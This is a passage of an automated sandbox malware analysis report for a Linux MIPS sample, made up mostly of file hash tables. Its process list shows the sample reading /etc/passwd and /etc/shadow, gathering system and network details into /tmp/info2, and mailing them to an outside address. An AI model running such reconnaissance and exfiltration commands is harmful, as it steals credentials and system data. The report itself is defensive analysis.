| MD5 | 20023cb42dbe41f228b4e2cf4007167e |
| SHA1 | 6af3ea0cd0c8cbc12a224096649059b69382fee2 |
| SHA256 | 9c1b9f7501cb6b313d7b546da8642ccbd2ca3e690f88c622d978cfa108d7bb73 |
| SHA512 | 7bc739217f93bf7b0bd3449f6b4265b18e5a58b65b548c79fe9321a5074f8c282fc85234ec4869f6c48552320b7bea3ab6f3cfcbc8770d3c30a23b611be8640f |
/var/spool/exim4/input/hdr.742
| MD5 | 04c0e4bc633cecf474451473b5d6fd02 |
| SHA1 | fc36aa04aa72a6e1e7579e2fdd87a14e829db072 |
| SHA256 | e42d5d25a2d6df4bad7220532f6f86143c335d59126081bc819a9757e06d3e45 |
| SHA512 | fe0c761d296d961d43dece017042d886ae36d7a305d8f01d1b375444019f49ce1d40d29f1db522d8aff035fe02cea379fffc510e8d013290e0ac7317d99e40a3 |
/var/spool/exim4/msglog/1sMlA5-0000By-UI
| MD5 | b221a8c13389abbd0069b1c2d52ff46b |
| SHA1 | 2ae7bc305f7b522bfff983631d9618f886e2c05e |
| SHA256 | 00eb4c323523445aac3deb567e655d9f5b1af8e5084aecde6d94c384a452c0aa |
| SHA512 | 778d7c8cb4dfa3e3087e76e472f79186b05546f0369515ae5c7b591ba52cba2976cd9f595672406423cb3b2d8acfe0c32aacdecfd008d63940d75af70a8de76e |
/var/spool/exim4/input/hdr.740
| MD5 | cfb0b0402ff7d8109eb1b64e7b0c7981 |
| SHA1 | b66a627119d421436ed532bea9d0c7b623d8e1b0 |
| SHA256 | 5ce4748fa7565dca1033969124c7d59665194866c9d538b936e09893eba47438 |
| SHA512 | c1ed34bb32bce5c164c8586cb34a0cb493d9aad8f7af91b74ea5a47ba5e636c96c6c2206b0b11d3268600054a6d4001bffe5af33d515b203570ea9ec2fc71a85 |
/var/mail/user
| MD5 | 5471f53b1487964143cead1539c0156a |
| SHA1 | e263808dfc68ccacfadcf4e2bce740e86b861e09 |
| SHA256 | 64328ba9c42cd8845f54a82f2b8eed2e87a52d1d4c542f871cea58ccce2fd7a6 |
| SHA512 | 80a9c221fc7df2b4629ac0e2d256cdbf880fd74655826d565362fc779b6332d08fa250a499a0164af0ac3324a991327653b8e157456ca8052858b1ac8a688e62 |
/var/spool/exim4/input/1sMlA5-0000By-UI-J
| MD5 | d7d96d63d643a4ce3e408eba7dfcedc5 |
| SHA1 | c53607f95c5c57beafc1d8266646797a035f76ea |
| SHA256 | 21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159 |
| SHA512 | 703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3 |
/var/spool/exim4/msglog/1sMlA5-0000By-UI
| MD5 | 82c17bdf35cfac7d40462a6dd625d604 |
| SHA1 | 8823a4e271af438824426321e878b741d65842f7 |
| SHA256 | 7e958c707c812ce28f022200c129abc94fd881cffe8e2cdd0e9add1256fa21c0 |
| SHA512 | f6fa5ab5e9cbf5fccb203f0f9e755bb09a57defb814d11844d9ed1195fbf969d9986a056a3c6c815b47519f0520dd8e969efcfe20d01f9285781c9745e186ea9 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-27 11:10
Reported
2024-06-27 11:13
Platform
debian9-mipsel-20240418-en
Max time kernel
13s
Max time network
12s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/uptime | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/free | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/kernel/osrelease | /usr/bin/uptime | N/A |
| File opened for reading | /proc/uptime | /usr/bin/uptime | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/free | N/A |
| File opened for reading | /proc/sys/kernel/osrelease | /usr/bin/free | N/A |
| File opened for reading | /proc/meminfo | /usr/bin/free | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/uptime | N/A |
| File opened for reading | /proc/loadavg | /usr/bin/uptime | N/A |
| File opened for reading | /proc/self/mountinfo | /bin/df | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/sbin/sendmail | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/sbin/exim4 | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/info2 | /tmp/15c7b600329249a4895395e61a9a88fe_JaffaCakes118 | N/A |
| File opened for modification | /tmp/muTv8Nkw | /usr/bin/mail | N/A |
| File opened for modification | /tmp/muS0iO4b | /usr/bin/mail | N/A |
Processes
/tmp/15c7b600329249a4895395e61a9a88fe_JaffaCakes118
[/tmp/15c7b600329249a4895395e61a9a88fe_JaffaCakes118]
/bin/uname
[uname -a]
/sbin/ifconfig
[/sbin/ifconfig]
/bin/grep
[grep inet]
/usr/bin/uptime
[uptime]
/bin/cat
[cat /proc/cpuinfo]
/bin/cat
[cat /etc/passwd]
/bin/cat
[cat /etc/shadow]
/bin/df
[df -h]
/usr/bin/free
[free]
/bin/ping
[ping -c 2 216.115.108.245]
/bin/cat
[cat /etc/hosts]
/bin/sleep
[sleep 5]
/bin/cat
[cat info2]
/bin/uname
[uname -a]
/usr/bin/mail
[mail -s Linux debian9-mipsel-20240418-en-13 4.9.0-13-4kc-malta #1 Debian 4.9.228-1 (2020-07-05) mips GNU/Linux [email protected]]
/usr/sbin/sendmail
[/usr/sbin/sendmail -oi -f root@debian9-mipsel-20240418-en-13 -t]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1sMl9j-0000Ce-0G]
/bin/sleep
[sleep 5]
/usr/sbin/exim4
[/usr/sbin/exim4 -t -oem -oi -f <> -E1sMl9j-0000Ce-0G]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1sMl9k-0000Cn-Id]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-13 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-13 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-13 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-13 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-13 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-13 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-13 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-13 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240418-en-13 | udp |
Files
/tmp/info2
| MD5 | 2bb6aed5111ef9726bcf6eef982ff32b |
| SHA1 | 4d49d894436449e792b0cdf8522584065b298c90 |
| SHA256 | e5e61fed291cefe8bd2c2b895b3001e679931c3d93f3597fb5e27b5bcae8f825 |
| SHA512 | 5c0aa37c6fa67edf72abdd2f7789538d0a2c12a1fec2dc575ee1df3c1874a4bda33259b3b60127ef4365410d85c742a0fb463f920b99c30863ff3c502494b3bf |
/tmp/info2
| MD5 | d20fbc2555eae6799ca62c8abbcf0917 |
| SHA1 | 6e0f851601aa4369bddbdedd64ec17a11d30e351 |
| SHA256 | 409157d1a59e1b7a323634d91913348bade070e938c299eb883c120c0586df4b |
| SHA512 | 1f91720a0a1d9be44708941f3547286238a1c0313d4e9e68a9efb329e8bae37e1d45923154d811343b38891c65ec40a79c0eb7df14258b0dea6c5306806d3baf |
/tmp/info2
| MD5 | d161e5c9d09b16c07cd4f33132023bc1 |
| SHA1 | 5ee1f1c9c07bed5ef9faf9295e47c3d1406146f4 |
| SHA256 | 65c1998c279949d05a346259388d16b7831d41c430ffe30584d87a1af593a3d5 |
| SHA512 | 9fad5954017dcfd7c8f5372e9e7ee003fb75bfe2326f5f4cb2e5754f25dcf9e4ba9d9378702d58e1a8a317c5c045f32bae09768c4f39f85672170f9347d93af8 |
/tmp/info2
| MD5 | 14dbdb43bacce2f3ceebe7d8e4a9b6f1 |
| SHA1 | 82dde42ae994b21af9b1f5f70d9ef1d48a10f3f4 |
| SHA256 | 7ddd4a31c23813ebf9992fb487d84c7c00e62e4311aa67425dc2f15de51e2f13 |
| SHA512 | 616dcf28145980c1de02e2c49bd5ba9ebb57bea976a82b79e8a38f33764c7d0c4a2dcc42333b3d3eceebba0e6c42d2d16a4c442bfd04eb77b5f93fbe6264f352 |
/tmp/info2
| MD5 | c0ef4f37430c4e69b9e743954e4f0893 |
| SHA1 | a6f58652afb8a0dbe35e3d3cfb132c3cf82dc31a |
| SHA256 | 81f5ec6907d884054b46e37b5e2300918eed25cd5eefd0730a073718c030dd5b |
| SHA512 | 7e83ef04a7037a0320df68ea7a592e9e074a3a1a7f6bf8f83665d983ad9926981d8c1fab46b4422904afc66ca32a7fbf74933422b75b9180178b6b56f7601a48 |
/tmp/info2
| MD5 | 15e07d6f143c0d49981b570c45d34a4d |
| SHA1 | 2a364272379857932a8a29e8350f974b2e1cb6ae |
| SHA256 | ef0b515e85fd32e30fe97965a081ac5b85505bb46b0e5f7d0c44b7ee911545e5 |
| SHA512 | 663ce0e9090f758de8601958c2c2a3d412be9d97fa0679a5c49e82a6c14fde028fa3815f1af9d6a4c9e9a81c248f56c00d48ec1f557809fdfd99e3f4daa5616a |
/var/spool/exim4/input/1sMl9j-0000Ce-0G-D
| MD5 | 22be44e3c2cdc8f06838b05acfe926a4 |
| SHA1 | 2e85770ed74a180edb214d609729cbc4811219ad |
| SHA256 | bc7af30d1c36e41f1eed8cb5e904342e668fe967cc2614bb4c984c989fa7568e |
| SHA512 | 570acf03fed85a4ce9397e78a16f085d33f680cf5b4ba8aed533d951b028fa74ce0f345abf263568468c276518560505e3d226ea4de4427f0da562a5b5c4e44b |
/var/spool/exim4/input/hdr.784
| MD5 | aea7c90da811efc918935991bb659bbc |
| SHA1 | b44cb50ecb8c03a4170a816a51c78bb7f1e009ff |
| SHA256 | be5aff11865fec7933e5cefbc643b2ec708cbc8ed01df1daec2d51c2d34a0d96 |
| SHA512 | 6136a82351de093750e8c97f6091d8ab3ab2fb7913ea6fd125d547ea670799e4ff1ec8f74ef593a5083d6e171636c8f1d412307293d324a711e8596267b82572 |
/var/spool/exim4/msglog/1sMl9j-0000Ce-0G
| MD5 | 0d5b19d1e57bfd8ffaceb20f629657a3 |
| SHA1 | 34efcdde1a3c62004e13514da29aca9e805b13e8 |
| SHA256 | 4fb72715ce953c39a7e7dba7cc1d812d8217db60a909e003f767764cea9936de |
| SHA512 | 57c282ce3ad821245510686c11b62dc4ab5732a1d0624c0a1221f19793beba63240fe71d379afef54b4fbe2b90907fd736dc809aa2668aaa3579a816285146ff |
/var/spool/exim4/msglog/1sMl9j-0000Ce-0G
| MD5 | e11b3c99ef47d5031867cc013c5334f9 |
| SHA1 | 845bdc58a1abd4c70a2fe134379d77fa4dd8c8a3 |
| SHA256 | cab3138ede41219bc056840fb20b792cc19b4c3bf324270d39e2a7ff9a60b86b |
| SHA512 | 9f39f82243b808ee9b7417f9b94daec527419e12904e2590baa29df8fa7980e7433b0ddd8aa7f454690fb9ec05ab99ce2a9a07c1035dde147365b43160af658f |
/var/spool/exim4/input/1sMl9k-0000Cn-Id-D
| MD5 | 994e5f70eae8d6ac6dacde9573fc535e |
| SHA1 | 2c8b4fcb8805a37d830bb6c23c399fdbb51d8cc3 |
| SHA256 | a404395c4114405405f44413f8dcf70d2feb380348a8aa91472f6be791f720c1 |
| SHA512 | 015dc8b3fc4593dc998ee437eb0b8b143b86ea38a45aafe3a3c195b9880aa61f39bccc7562ed0055a96d5932e614b65c83888844e4c59594cb4cf90d75ea0a23 |
/var/spool/exim4/input/hdr.793
| MD5 | 9c44580466aefbea963f6ed85434ee2e |
| SHA1 | a097bc187c1bc277093a851643d93ad1037154ee |
| SHA256 | 9f6fd40dfcac7c53ea211814990b4a25a9aedf7f151161c64b6f18a39152d29b |
| SHA512 | c8adb6f609ffe5b60da2a16d9a58052f34f32f4d5986dbffff9b4b4828e1a8d8c32da24c0177131dca5b9cc699cfdff504735a3311db4a677a740bbe193eb294 |
/var/spool/exim4/msglog/1sMl9k-0000Cn-Id
| MD5 | 3af5d89b4110bb0a80399167fc21e59e |
| SHA1 | d015c18cf232a3f365f8866c4af6f935ae0b98c5 |
| SHA256 | c4484145e289743d6e090d79374abc2a132a5b9e3cc0601fa48b6b0d7f701813 |
| SHA512 | 058f68d70629b32702d57d4e134501af9348fbe2ed493c02ebdcf339502d33e64863f1011c15e7d2b0711b8cbd9d23f4894b985651ebdde6ed8b9f65143aa4ee |
/var/spool/exim4/input/hdr.790
| MD5 | a07da5d491e18fdce753af5ce1f843c9 |
| SHA1 | d8858ae1c2f7e6bf204ff91978b88d37bf5e10d8 |
| SHA256 | 02ae76b449bd9bf98acf09ee2cbd66551cf5619a07cf4ab197f4e615538ee724 |
| SHA512 | 7de37301a10d48a4905559af97c4c74df8ea2f9cfa6fda1209a11515719a338c38e74573c2442d0d477c46d3d30505498d07fb3ac25aa5f7551b9a53cfdf1ba9 |
/var/mail/user
| MD5 | 3515ebcb849f017e8d1e6186b2c2f7ad |
| SHA1 | 0356b4b21b0fcdf79956d965f1ee03847ed21c0c |
| SHA256 | 20d2b30159081ced35f9f71da97c25ca1d241ae05aee8e42a4cf575526169239 |
| SHA512 | 11dd497cbc8a8f0c7362ab86af85756c8a0835f4213d72174492ef7d87e72cf11e08fe8b1609e1166a44d2f6d25a3e9d3bb9cfc0876be106a0b0cfc15c3281a4 |
/var/spool/exim4/input/1sMl9k-0000Cn-Id-J
| MD5 | d7d96d63d643a4ce3e408eba7dfcedc5 |
| SHA1 | c53607f95c5c57beafc1d8266646797a035f76ea |
| SHA256 | 21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159 |
| SHA512 | 703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3 |
/var/spool/exim4/msglog/1sMl9k-0000Cn-Id
| MD5 | 67f70b48845041e131628e1d8ca7e741 |
| SHA1 | 2e7e14b6a62a2acb2c9cbc5a06d15a7c0433c54a |
| SHA256 | 71aabfb65e6091a7e059b303d4256ec337c88dab1bc7edbb8e1466346cba54b8 |
| SHA512 | 116ec7f94749689307365fc889c9f71bcb069af65cc4daecf47a09927dc5b578f6aaacf0512cd7e04a08e1686d1d93cc843798a24416c8a231ff9b6ee850e610 |